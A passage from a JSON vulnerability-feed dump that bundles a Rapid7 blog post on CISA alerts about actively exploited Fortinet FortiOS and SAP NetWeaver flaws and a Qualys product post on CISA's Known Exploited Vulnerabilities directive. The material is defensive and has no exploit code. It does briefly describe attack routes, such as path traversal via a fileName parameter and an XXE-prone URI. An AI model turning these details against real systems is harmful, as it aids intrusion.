2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-06T18:47:57", "type": "threatpost", "title": "SAP Bugs Under Active Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-5326", "CVE-2016-3976", "CVE-2016-9563", "CVE-2018-2380", "CVE-2020-6207", "CVE-2020-6287"], "modified": "2021-04-06T18:47:57", "id": "THREATPOST:4CFA3A7AC21D83FC03B1B74B2DA261BD", "href": "https://threatpost.com/sap-bugs-cyberattack-compromise/165265/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-04-08T18:54:35", "description": "![Attackers Targeting Fortinet Devices and SAP Applications](https://blog.rapid7.com/content/images/2021/04/target.jpg)\n\n_The following blog was co-authored by Caitlin Condon and [Bob Rudis](<https://blog.rapid7.com/author/bob-rudis>), also known (in his own words) as \u201csome caveman from Maine.\u201d_\n\nLast week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the FBI [published a joint alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>) to warn users that APT threat actors were likely exploiting unpatched Fortinet FortiOS devices to gain initial access to government, commercial, technology, and other organizations\u2019 networks. The alert highlighted three FortiOS vulnerabilities, all of which were previously known, and at least one of which (CVE-2018-13379) has been broadly exploited for more than 18 months. This week, CISA [published an additional alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications>) amplifying a threat report from security firm Onapsis, which describes [ongoing attacks against SAP applications](<https://onapsis.com/active-cyberattacks-mission-critical-sap-applications>).\n\nRapid7 has previously analyzed a number of the highest-severity vulnerabilities enumerated in this latest set of alerts. The CVEs included in these reports have been detailed below, along with recommendations for organizations seeking to defend themselves against ongoing exploitation. Notably, none of these vulnerabilities are new\u2014many of them are a year or more old, which underscores the need for a regular patch cycle, as well as a defined patch cycle exception process.\n\n## FortiOS vulnerabilities\n\nFortinet devices are what we call **network pivots**\u2014that is, the position they occupy in organizations\u2019 networks gives external attackers the ability to access internal networks if exploited successfully, which in turn allows for a range of secondary attacks and other nefarious activities. If at all possible, defenders should strongly consider implementing a \u201czero-day\u201d patch cycle for internet-exposed and other network pivot products, including (but not only) Fortinet and other VPNs. InsightVM and Nexpose customers can assess their exposure to all three FortiOS CVEs below with vulnerability checks.\n\n * CVE-2018-13379 is a pre-authentication information disclosure vulnerability that arises from a path traversal flaw in the web portal component of FortiOS SSL VPNs. The vulnerability allows external attackers to download FortiOS system files through specially crafted HTTP resource requests and has been [exploited in the wild since 2019](<https://us-cert.cisa.gov/ncas/current-activity/2019/10/04/vulnerabilities-exploited-multiple-vpn-applications>). Read our [full analysis of CVE-2018-13379 and its history here](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=blog#rapid7-analysis>).\n * [CVE-2019-5591](<https://attackerkb.com/topics/sWpteHiN5z/cve-2019-5591?referrer=blog>) is a default configuration vulnerability in FortiOS that allows an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n * [CVE-2020-12812](<https://attackerkb.com/topics/8qnr47UsVL/cve-2020-12812?referrer=blog>) is an improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below that gives a user the ability to log in successfully without being prompted for the second factor of authentication (FortiToken) if that user changes the case of their username.\n\nSince the beginning of March, Rapid7 Labs' Heisenberg Honeypot fleet has seen nearly 60 IP addresses attempting common, known single `GET` request exploits against Fortinet devices (we\u2019ve grouped the IP addresses up to the hosting provider/ISP level):\n\n![Attackers Targeting Fortinet Devices and SAP Applications](https://blog.rapid7.com/content/images/2021/04/image2.png)\n\nUnfortunately, our fleet does not emulate Fortinet devices. Since these devices are fairly easy to distinguish on the internet (nearly 1 million of them in the image, below)\u2014due to the common, vendor SSL certificate they use\u2014it is surprising to see opportunistic exploit attempts versus just inventory/discovery scans.\n\n![Attackers Targeting Fortinet Devices and SAP Applications](https://blog.rapid7.com/content/images/2021/04/image1.png)Over 1 million Fortinet devices discovered by the latest Project Sonar scans (geolocated with MaxMind)\n\nThat last sentence should help organizations underscore why CISA and the FBI raised the Fortinet exploitation campaign to the level of a joint alert: Attackers can easily identify legitimate Fortinet endpoints on the internet, and it takes virtually no time from discovery to exploit if a target system is not patched and configured properly.\n\nOn April 3, 2021, Fortinet published [a post on patch and vulnerability management](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>) where they outlined their emergency response and patch release practices new alignment to ISO standards and further emphasized the need to keep internet-exposed Fortinet devices patched. They have a special knowledge base article on [how to keep notified about Fortinet patch releases](<https://kb.fortinet.com/kb/microsites/search.do?cmd=displayKC&docType=kc&externalId=FD50697&sliceId=1&docTypeID=DT_KCARTICLE_1_1&dialogID=184200521&stateId=1%200%20184202090%27>) and provide multiple ways for organizations to say current on Fortinet security updates. \n\nAs Fortinet notes in that post, these weaknesses have had patches available for quite some time, so if you\u2019re just getting around to fixing them, you may need to dedicate some further cycles to some forensic activity, as it is very likely one or more attackers have already taken advantage of these vulnerabilities.\n\nTo learn more about other vulnerabilities that functioned as network pivots for attackers, read [Rapid7\u2019s 2020 Vulnerability Intelligence Report](<https://www.rapid7.com/research/report/vulnerability-intelligence-report/>).\n\n## Actively exploited SAP vulnerabilities\n\nThe two most recent SAP vulnerabilities detailed in Onapsis\u2019 threat report are CVE-2020-6287, a CVSS-10 vulnerability in the SAP NetWeaver Application Server (AS) Java component LM Configuration Wizard that has been actively exploited in the wild since July 2020, and SAP Solution Manager CVE-2020-6207. Both of these vulnerabilities allow broad compromise of SAP applications and environments.\n\n * CVE-2020-6287 is present by default in SAP applications running on top of SAP NetWeaver AS Java 7.3 and any newer versions (up to SAP NetWeaver 7.5). It allows remote, unauthenticated attackers to exploit and fully compromise vulnerable SAP installations. Exploitation of CVE-2020-6287 through the HTTP interface allows for modification or extraction of highly sensitive information and disruption of critical business processes. For a list of affected applications and additional guidance, read Rapid7\u2019s [full analysis here](<https://attackerkb.com/topics/JubO1RiVBP/cve-2020-6287-critical-vulnerability-in-sap-netweaver-application-server-as-java?referrer=blog#rapid7-analysis>).\n * CVE-2020-6207 arises from a missing authentication check in version 7.2 of SAP\u2019s Solution Manager product, allowing attackers to completely compromise all SMDAgents connected to the Solution Manager. \nSAP customers should pay close attention to their access logs and monitor for unauthorized user account creation; they should also ensure that web services in general do not run using privileged accounts. InsightVM and Nexpose customers can assess their risk to CVE-2020-6287 with a remote vulnerability check. A check for CVE-2020-6207 is currently under development.\n\nOther SAP vulnerabilities noted as being exploited in the wild include:\n\n * CVE-2018-2380 affects SAP CRM versions 7.01, 7.02, 7.30, 7.31, 7.33, and 7.54. The vulnerability allows an attacker to exploit insufficient validation of path information provided by users, letting characters representing "traverse to parent directory" pass through to the file APIs.\n * CVE-2016-9563 is a vulnerability in SAP NetWeaver Application Server (AS) Java 7.5 that allows remote authenticated users to conduct XML External Entity (XXE) attacks via the sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn URI.\n * CVE-2016-3976 is a directory traversal vulnerability in SAP NetWeaver AS Java 7.1 through 7.5 that allows remote attackers to read arbitrary files via a ..\\ (dot dot backslash) in the fileName parameter to `CrashFileDownloadServlet`.\n * CVE-2010-5326 is a CVSS-10 vulnerability in the `Invoker` Servlet on SAP NetWeaver Application Server Java platforms that arises from a lack of authentication and allows remote attackers to execute arbitrary code via an HTTP or HTTPS request. It was used in attacks from 2013 to 2016.\nAttackers have used these vulnerabilities to establish persistence, escalate privileges, and evade detection. It is also possible that threat actors may build exploit chains that extend access beyond SAP applications to underlying operating systems. Further information and recommendations is [available from Onapsis here](<https://www.onapsis.com/active-cyberattacks-mission-critical-sap-applications>). \n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-04-08T17:18:07", "type": "rapid7blog", "title": "Attackers Targeting Fortinet Devices and SAP Applications", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-5326", "CVE-2016-3976", "CVE-2016-9563", "CVE-2018-13379", "CVE-2018-2380", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-6207", "CVE-2020-6287"], "modified": "2021-04-08T17:18:07", "id": "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "href": "https://blog.rapid7.com/2021/04/08/attackers-targeting-fortinet-devices-and-sap-applications/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-Actual-1.jpg)\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-3.jpg)\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-4-scaled.jpg)\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/patch-mgmt-windows2.jpg)\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-6.jpg)\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

SAP NetWeaver AS Java Directory Traversal Vulnerability (2547431)

Description

Related